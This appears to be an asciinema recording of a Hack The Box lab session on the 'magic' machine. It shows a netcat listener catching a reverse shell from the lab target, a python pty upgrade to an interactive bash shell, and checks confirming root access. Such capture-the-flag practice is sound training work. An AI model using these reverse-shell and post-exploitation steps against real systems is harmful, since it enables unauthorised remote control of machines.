{"version": 2, "width": 150, "height": 34, "timestamp": 1587367043, "env": {"SHELL": "/usr/bin/zsh", "TERM": "xterm-256color"}}
[0.163361, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r"]
[0.165261, "o", "\u001b]2;root@parrot: /home/prashant/Desktop/hackthebox/machines/magic\u0007\u001b]1;..achines/magic\u0007\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;32m➜  \u001b[36mmagic\u001b[00m \u001b[K\u001b[?1h\u001b=\u001b[?2004h"]
[0.757974, "o", "asciinema rec"]
[1.044411, "o", "\u001b[13Dnc -nlvp 1234"]
[1.981032, "o", "\b\b\b\b2345"]
[2.708923, "o", "\u001b[?1l\u001b>"]
[2.709248, "o", "\u001b[?2004l\r\r\n"]
[2.710712, "o", "\u001b]2;nc -nlvp 2345\u0007\u001b]1;nc\u0007"]
[2.71694, "o", "Ncat: Version 7.80 ( https://nmap.org/ncat )\r\nNcat: Listening on :::2345\r\nNcat: Listening on 0.0.0.0:2345\r\n"]
[6.770572, "o", "Ncat: Connection from 10.10.10.185.\r\nNcat: Connection from 10.10.10.185:59712.\r\n"]
[9.405129, "o", "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'\r\n"]
[9.947278, "o", "root@ubuntu:/tmp# "]
[11.140536, "o", "w"]
[11.348063, "o", "h"]
[11.571849, "o", "o"]
[11.73987, "o", "a"]
[11.89179, "o", "m"]
[12.091924, "o", "i"]
[12.315749, "o", "\r\n"]
[12.819198, "o", "whoami\r\r\n"]
[13.138936, "o", "root\r\r\nroot@ubuntu:/tmp# "]
[13.763905, "o", "w"]
[14.083623, "o", "c"]
[14.291809, "o", " "]
[14.819723, "o", "/"]
[15.043854, "o", "r"]
[15.243709, "o", "o"]
[15.380606, "o", "o"]
[15.475752, "o", "t"]
[15.780227, "o", "."]
[16.851892, "o", "\b \b"]
[17.459823, "o", "/"]
[17.675888, "o", "r"]
[18.091935, "o", "o"]
[18.24364, "o", "o"]
[18.459934, "o", "t"]
[18.635547, "o", "."]
[19.043784, "o", "t"]
[19.195892, "o", "x"]
[19.299817, "o", "t"]
[19.676011, "o", "\r\n"]
[20.189225, "o", "wc /root/root.txt\r\r\n"]
[20.500107, "o", " 1  1 33 /root/root.txt\r\r\nroot@ubuntu:/tmp# "]
[21.636203, "o", "i"]
[21.891991, "o", "f"]
[22.123728, "o", "c"]
[22.291899, "o", "o"]
[22.57991, "o", "n"]
[22.795987, "o", "f"]
[22.996352, "o", "i"]
[23.155757, "o", "g"]
[24.036027, "o", "\r\n"]
[24.358584, "o", "ifconfig\r\r\n"]
[24.644412, "o", "ens160: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500\r\r\n        inet 10.10.10.185  netmask 255.255.255.0  broadcast 10.10.10.255\r\r\n        inet6 fe80::250:56ff:feb9:59d7  prefixlen 64  scopeid 0x20<link>\r\r\n        inet6 dead:beef::250:56ff:feb9:59d7  prefixlen 64  scopeid 0x0<global>\r\r\n        ether 00:50:56:b9:59:d7  txqueuelen 1000  (Ethernet)\r\r\n        RX packets 34654  bytes 3122653 (3.1 MB)\r\r\n        RX errors 0  dropped 10  overruns 0  frame 0\r\r\n        TX packets 19907  bytes 6521550 (6.5 MB)\r\r\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\r\r\n\r\r\nlo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536\r\r\n        inet 127.0.0.1  netmask 255.0.0.0\r\r\n        inet6 ::1  prefixlen 128  scopeid 0x10<host>\r\r\n        loop  txqueuelen 1000  (Local Loopback)\r\r\n        RX packets 43263  bytes 3073186 (3.0 MB)\r\r\n        RX errors 0  dropped 0  overruns 0  frame 0\r\r\n        TX packets 43263  bytes 3073186 (3.0 MB)\r\r\n        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0\r\r\n\r\r\nroot@ubuntu:/t"]
[24.644811, "o", "mp# "]
[26.91676, "o", "^C"]
[26.916895, "o", "\r\n"]
[26.917505, "o", "\u001b[1m\u001b[7m#\u001b[27m\u001b[1m\u001b[0m                                                                                                                                                     \r \r\u001b]2;root@parrot: /home/prashant/Desktop/hackthebox/machines/magic\u0007\u001b]1;..achines/magic\u0007"]
[26.917696, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[01;31m➜ \u001b[27m \u001b[36mmagic\u001b[00m \u001b[K"]
[26.917799, "o", "\u001b[?1h\u001b="]
[26.91802, "o", "\u001b[?2004h"]
[28.492723, "o", "\u001b[?2004l\r\r\n"]
